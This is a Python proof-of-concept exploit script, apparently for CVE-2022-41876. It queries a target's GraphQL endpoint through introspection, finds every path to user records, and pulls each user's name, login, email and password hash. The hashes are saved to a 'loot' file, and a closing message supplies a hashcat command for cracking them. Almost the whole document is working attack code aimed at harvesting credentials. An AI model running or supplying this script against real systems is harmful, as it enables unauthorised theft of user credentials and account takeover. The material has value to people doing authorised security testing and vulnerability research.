README.md
Rendering markdown...
import requests
import sys
import os
import argparse
import json
from R2Log import logger
from R2Log import console
from rich.table import Table
from rich.live import Live
# Define the type to search for
TARGET_TYPE = 'User'
# Parse args
def parse_args():
parser = argparse.ArgumentParser(add_help=True, description='CVE-2022-41876 POC')
parser.add_argument('url', action='store', help='Target URL (specify the graphql endpoint)')
parser.add_argument('-t', '--thread', action='store_true', help='Number of threads')
parser.add_argument('-f', '--file', action='store', help='Local path to introspect file')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def prepare_table():
# Create the results table
table = Table(title="Contributor accounts found")
table.add_column("Account id", justify="right", style="cyan", no_wrap=True)
table.add_column("Name", justify="left", style="cyan", no_wrap=True)
table.add_column("Login", justify="left", style="cyan", no_wrap=True)
table.add_column("PasswordHash", justify="left", style="red", no_wrap=True)
table.add_column("email", justify="left", style="cyan", no_wrap=True)
table.add_column("Enabled", justify="left", style="cyan", no_wrap=True)
table.add_column("maxLogin", justify="left", style="cyan", no_wrap=True)
return table
def introspection_query(url, introspect):
logger.info("Retrieving data from the specified url or file")
if introspect:
try:
with open(introspect, "r") as f:
data = json.load(f)
except FileNotFoundError:
logger.error('The file "%s" does not exist' % introspect)
sys.exit(1)
except json.decoder.JSONDecodeError:
logger.error('The file "%s" is not a correct JSON file' % introspect)
sys.exit(1)
else:
r = requests.get('%s?query={__schema{types{name,fields{name,type{name}}}}}' % url)
if r.status_code != 200:
logger.error("The specified url returned status code %i" % r.status_code)
logger.info("url = %s" % url)
sys.exit(1)
try:
data = r.json()
except requests.exceptions.JSONDecodeError:
logger.error("Could not retrieve any JSON file from the specified endpoint.")
logger.info("url = %s" % url)
sys.exit(1)
# Get the list of all types in the schema
try:
types = data['data']['__schema']['types']
except KeyError:
logger.error("JSON file retrieved from specified url or file is not of the expected introspect format")
sys.exit(1)
logger.success("Data retrieved successfully\n")
logger.info("Retrieving paths to users' hashes")
# Create a dictionary to store the fields of each type
type_fields = {}
for t in types:
if not t['fields']:
type_fields[t['name']] = []
else:
type_fields[t['name']] = [f['name'] for f in t['fields']]
paths = find_paths('Domain', 'types', type_fields, types, set())
logger.success("Paths retrieved successfully\n")
return paths
# Define a recursive function to find paths to the target type
def find_paths(current_type, current_path, type_fields, types, visited_types):
# Check if we have already visited this type
if current_type in visited_types:
return []
# Add the current type to the visited types
visited_types.add(current_type)
# Check if we have reached the target type
if current_type == TARGET_TYPE:
return [current_path]
# Check if the current type has any fields
if not type_fields[current_type]:
return []
# Recursively search for paths to the target type
paths = []
for field in type_fields[current_type]:
next_type = None
for t in types:
if t['name'] == current_type:
for f in t['fields']:
if f['name'] == field:
next_type = f['type']['name']
break
break
if next_type is not None:
next_path = current_path + '.' + field
next_paths = find_paths(next_type, next_path, type_fields, types, visited_types.copy())
paths.extend(next_paths)
return paths
def get_user_info(data):
users = []
if isinstance(data, list):
for elem in data:
users.append(get_user_info(elem))
return users
elif isinstance(data, dict):
if "id" in data:
return (data["id"], data["name"], data["login"], data["passwordHash"], data["email"], data["enabled"], data["maxLogin"])
else:
return get_user_info(data[list(data.keys())[0]])
def main():
args = parse_args()
url = args.url
introspect = args.file
if 'graphql' not in url:
logger.warning('The specified url does not contain "/graphql"\n')
table = prepare_table()
# Find all paths to the target type starting from the domain root
paths = introspection_query(url, introspect)
os.makedirs(os.path.dirname("./loot/hashes"), exist_ok=True)
with Live(table, refresh_per_second=4, console=console) as live:
with open("./loot/hashes.txt", "a+") as loot_file:
logger.info('Retrieving hashes from found paths\n')
found_users = []
errors = 0
error_displayed = False
for path in paths:
table.caption = " [yellow3]Request[/]: %d/%d (%3.1f%%)" % (paths.index(path), len(paths), round(paths.index(path) / len(paths) * 100, 1))
path = path.replace("types.", "{")
path = path.replace(".", "{") + "{id,name,login,passwordHash,email,enabled,maxLogin"
path += "}" * path.count("{")
response = requests.get('%s?query=%s' % (url, path))
if response.status_code == 200:
user_data = response.json()
if "passwordHash" in str(user_data):
extract = get_user_info(user_data)
if isinstance(extract, list):
for users in extract:
if not users[0] in found_users:
found_users.append(users[0])
loot_file.write(users[3]+"\n")
table.add_row(str(users[0]), users[1], users[2], users[3], users[4], str(users[5]), str(users[6]))
else:
if not extract[0] in found_users:
found_users.append(extract[0])
loot_file.write(extract[3]+"\n")
table.add_row(str(extract[0]), extract[1], extract[2], extract[3], extract[4], str(extract[5]), str(extract[6]))
else:
errors += 1
error_rate = round(errors / len(paths) * 100, 1)
if error_rate > 5 and not error_displayed:
logger.warning("There is more than 5% error in server responses, check if the specified url is a valid graphql endpoint")
logger.warning("url = %s\n" % url)
error_displayed = True
continue
live.update(table)
logger.info("It is possible to crack the hashes found with the following hashcat command:")
console.print("{}hashcat --hash-type 3200 ./loot/hashes.txt $(fzf-wordlists){}\n".format("[bold green]", "[/bold green]"))
console.print("{}Install {}Exegol{} or replace '$(fzf-wordlists)' with the path to your wordlist{}".format("[italic]", "[bold red]", "[/][italic]", "[/]"))
if __name__ == '__main__':
main()